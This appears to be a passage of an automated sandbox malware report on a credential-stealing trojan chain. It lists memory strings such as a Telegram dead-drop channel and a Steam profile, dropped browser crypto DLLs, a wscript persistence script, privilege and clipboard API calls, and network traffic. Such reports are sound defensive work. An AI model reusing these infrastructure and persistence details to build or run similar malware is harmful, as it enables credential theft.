                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/stats/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: AAAAKJ.11.dr | String found in binary or memory: https://support.mozilla.org
                    Source: AAAAKJ.11.dr | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: AAAAKJ.11.dr | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                    Source: Hist.pif, 0000000B.00000003.2554923628.00000000015D6000.00000004.00000020.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555154837.0000000004954000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073354525.0000000004920000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072722051.0000000004620000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555196577.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555177595.000000000463F000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073354525.0000000004953000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073627250.0000000004D21000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2554949475.00000000046C3000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555073817.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555115715.00000000015D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/puffclou
                    Source: Hist.pif, 0000000B.00000003.2554923628.00000000015D6000.00000004.00000020.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555154837.0000000004954000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073354525.0000000004920000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072722051.0000000004620000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555196577.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555177595.000000000463F000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073354525.0000000004953000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073627250.0000000004D21000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2554949475.00000000046C3000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555073817.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555115715.00000000015D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/puffclouhellosqlt.dllsqlite3.dll
                    Source: Hist.pif, 0000000B.00000002.3072722051.0000000004653000.00000004.00000800.00020000.00000000.sdmp, HCFBKK.11.dr | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                    Source: Hist.pif, 0000000B.00000002.3072722051.0000000004653000.00000004.00000800.00020000.00000000.sdmp, HCFBKK.11.dr | String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: https://www.digicert.com/CPS0
                    Source: GCFIIE.11.dr | String found in binary or memory: https://www.ecosia.org/newtab/
                    Source: mg9LPWGtPB.exe, Knitting.0.dr, Bk.pif.17.dr, Performing.16.dr, SolarSys.pif.29.dr, Hist.pif.2.dr | String found in binary or memory: https://www.globalsign.com/repository/0
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2003742764.0000000002905000.00000004.00000020.00020000.00000000.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3035364924.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3094253513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3928833943.0000000003417000.00000004.00000020.00020000.00000000.sdmp, Knitting.0.dr, Bk.pif.17.dr, Performing.16.dr, SolarSys.pif.29.dr, Hist.pif.2.dr | String found in binary or memory: https://www.globalsign.com/repository/03
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
                    Source: GCFIIE.11.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: AAAAKJ.11.dr | String found in binary or memory: https://www.mozilla.org
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3077545139.000000000C55F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/
                    Source: AAAAKJ.11.dr | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3077545139.000000000C55F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/
                    Source: AAAAKJ.11.dr | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3077545139.000000000C55F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                    Source: Hist.pif, 0000000B.00000003.2902325535.0000000012DBD000.00000004.00000800.00020000.00000000.sdmp, AAAAKJ.11.dr | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                    Source: AAAAKJ.11.dr | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: Hist.pif, 0000000B.00000003.2902325535.0000000012DBD000.00000004.00000800.00020000.00000000.sdmp, AAAAKJ.11.dr | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3077545139.000000000C55F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                    Source: Hist.pif, 0000000B.00000003.2902325535.0000000012DBD000.00000004.00000800.00020000.00000000.sdmp, AAAAKJ.11.dr | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.dr | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: unknown | Network traffic detected: HTTP traffic on port 64937 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64943 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64947 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64934
                    Source: unknown | Network traffic detected: HTTP traffic on port 64952 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64936
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64935
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64938
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64937
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64939
                    Source: unknown | Network traffic detected: HTTP traffic on port 64956 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64938 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64944 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64940 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64948 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64945
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64944
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64947
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64946
                    Source: unknown | Network traffic detected: HTTP traffic on port 64955 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64949
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64948
                    Source: unknown | Network traffic detected: HTTP traffic on port 64951 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64934 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64959 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64941
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64940
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64943
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64942
                    Source: unknown | Network traffic detected: HTTP traffic on port 64941 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64939 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64945 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64949 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64956
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64955
                    Source: unknown | Network traffic detected: HTTP traffic on port 64954 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64958
                    Source: unknown | Network traffic detected: HTTP traffic on port 64950 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64959
                    Source: unknown | Network traffic detected: HTTP traffic on port 64935 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64958 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64950
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64952
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64951
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64954
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64953
                    Source: unknown | Network traffic detected: HTTP traffic on port 64942 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64946 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64953 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64936 -> 443
                    Source: unknown | HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.5:64934 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 65.109.241.221:443 -> 192.168.2.5:64935 version: TLS 1.2
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exe | Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_00094614 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_003B4614 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_00094416 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exe | Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_000ACEDF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_003CCEDF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                    System Summary

                    Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js"
                    Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js"
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_000840C1: CreateFileW,DeviceIoControl,CloseHandle
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_00078D11 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exe | Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_000855E5 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                    Source: C:\ProgramData\EHIJJDGDHD.exe | Code function: 16_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_003A55E5 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exe | Code function: 0_2_0040497C
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exe | Code function: 0_2_00406ED2
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exe | Code function: 0_2_004074BB
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_0002B020
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_000294E0
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_00029C80
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_000A81C8
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_00042325
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_00056432
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_0005258E
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_0002E6F0
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_0004275A
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_000A0802
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_000588EF
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_000569A4
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_0007EB95
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_00030BE0
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_000A0C7F
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_0004CC81
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_00088CB1
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_00056F16
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_000432E9
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_0004F339
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_0003D457
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_0003F57E
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_000415E4
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_00021663
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_0002F6A0
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_000477F3
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_0004DAD5
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_00041AD8
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_00059C15
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_0003DD14
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_00041EF0
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_0004BF06
                    Source: C:\ProgramData\EHIJJDGDHD.exe | Code function: 16_2_0040497C
                    Source: C:\ProgramData\EHIJJDGDHD.exe | Code function: 16_2_00406ED2
                    Source: C:\ProgramData\EHIJJDGDHD.exe | Code function: 16_2_004074BB
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_0034B020
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_003494E0
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_00349C80
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_003C81C8
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_00362325
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_00376432
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_0037258E
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_0034E6F0
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_0036275A
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_003C0802
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_003788EF
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_003769A4
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_0039EB95
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_00350BE0
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_003C0C7F
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_003A8CB1
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_0036CC81
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_00376F16
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_003632E9
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_0036F339
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_0035D457
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_0035F57E
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_003615E4
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_00341663
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_0034F6A0
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_003677F3
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_0036DAD5
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_00361AD8
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_00379C15
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_0035DD14
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_00361EF0
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_0036BF06
                    Source: Joe Sandbox View | Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                    Source: Joe Sandbox View | Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: String function: 00031A36 appears 35 times
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: String function: 00048A60 appears 42 times
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: String function: 00040C42 appears 70 times
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: String function: 00368A60 appears 42 times
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: String function: 00351A36 appears 34 times
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: String function: 00360C42 appears 70 times
                    Source: C:\ProgramData\EHIJJDGDHD.exe | Code function: String function: 004062A3 appears 57 times
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: String function: 004062A3 appears 57 times
                    Source: mg9LPWGtPB.exeStatic PE information: invalid certificate
                    Source: mg9LPWGtPB.exe, 00000000.00000002.2030640385.00000000007A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs mg9LPWGtPB.exe
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2014471927.0000000002911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs mg9LPWGtPB.exe
                    Source: mg9LPWGtPB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@64/93@6/7
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008A51A GetLastError,FormatMessageW,11_2_0008A51A
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00078BCC AdjustTokenPrivileges,CloseHandle,11_2_00078BCC
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0007917C LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_0007917C
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_00398BCC AdjustTokenPrivileges,CloseHandle,38_2_00398BCC
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0039917C LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,38_2_0039917C
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00083FB5 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,11_2_00083FB5
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000842AA __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,11_2_000842AA
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199735694209[1].htmJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5588:120:WilError_03
